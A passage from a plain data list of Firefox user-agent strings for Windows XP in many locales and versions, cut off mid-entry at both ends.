5.1; de; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.21\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.2pre) Gecko/2008082305 Firefox/3.0.2pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Firefox/3.0.8)\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.8) Gecko/2009032609 Firefox/3.07\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.0.04506.30)\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.0.04506.648)\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0.1pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6) Gecko/20050321 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.6) Gecko/2009011913 Firefox\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 GTB7.1 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 AskTbUTR/3.11.3.15590 Firefox/3.6.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.7.10) Gecko/20050716 Firefox/1.0.5\nMozilla/5.0 (Windows; U; Windows NT5.1; en; rv:1.7.10) Gecko/20050716 Firefox/1.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.1.13) Gecko/20100914 Firefox/3.6.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050223 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2 (ax)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3 (ax)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5 (ax)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040614 Firefox/0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040707 Firefox/0.9.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10pre) Gecko/20070211 Firefox/1.5.0.10pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060309 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060406 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060419 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.9.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.17pre) Gecko/20080715 Firefox/2.0.0.8pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.21) Gecko/20090403 Firefox/1.1.16\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070118 Firefox/2.0.0.2pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060821 Firefox/2.0b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050729 Firefox/1.0+\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729) FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2008121605 Firefox/3.0.6pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6pre) Gecko/2009011606 Firefox/3.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.11 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 AskTbPLTV5/3.8.0.12304 Firefox/3.5.16 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20120427 Firefox/15.0a1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729) FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b3pre) Gecko/20090213 Firefox/3.0.1b3pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090409 Firefox/3.5b4pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090517 Firefox/3.5b4pre (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.20) Gecko/20110803 AskTbFWV5/3.13.0.17701 Firefox/3.6.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/5.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.0.16 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051220 Firefox/1.6a1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060121 Firefox/1.6a1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20060323 Firefox/1.6a1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b1) Gecko/2007110703 Firefox/3.0b1\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b4pre) Gecko/2008020708 Firefox/3.0b4pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5pre) Gecko/2008030706 Firefox/3.0b5pre\nMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:2.0.1) Gecko/20110606 Firefox/4.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8) Gecko/20060321 Firefox/2.0a1\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fa; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7\nMozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-be; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.6) Gecko/20050226 Firefox/1.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.6) Gecko/20040206 Firefox/0.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.7) Gecko/20040707 Firefox/0.9.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.7) Gecko/20040803 Firefox/0.9.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 (.NET CLR 3.0.04506.30)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.3C\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5\nMozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.9a1) Gecko/20100202 Firefox/3.0.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8b5) Gecko/20051006 Firefox/1.4.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 FBSMTWB\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.28) Gecko/20120306 AskTbSTC-SRS/3.13.1.18132 Firefox/3.6.28 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 GTB7.0 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2.25) Gecko/20111212 Firefox/3.6.25 (.NET CLR 3.5.30729; .NET4.0C)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.2a1pre) Gecko/20090402 Firefox/3.6a1pre (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5\nMozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12\nMozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 (.NET CLR 3.5.30729; .NET4.0E)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4\nMozilla/5.0 (Windows; U; Windows NT 5.1; lt; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4\nMozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.1) Gecko/20061204 Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1) Gecko/20060918 Firefox/2.0b2\nMozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB6 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 GTB6\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ro-RO; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; ro; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.12) Gecko/20100824 MRA 5.7 (build 03755) Firefox/3.5.12\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.7 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3\nMozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040911 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040913 Firefox/0.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20040913 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1\nMozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 (.NET CLR 3.5.30729)\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.7.6) Gecko/20050318 Firefox/1.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.12) Gecko/20070508 Firefox/1.5.0.12\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\nMozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9\nMozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.9) Gecko/20071025 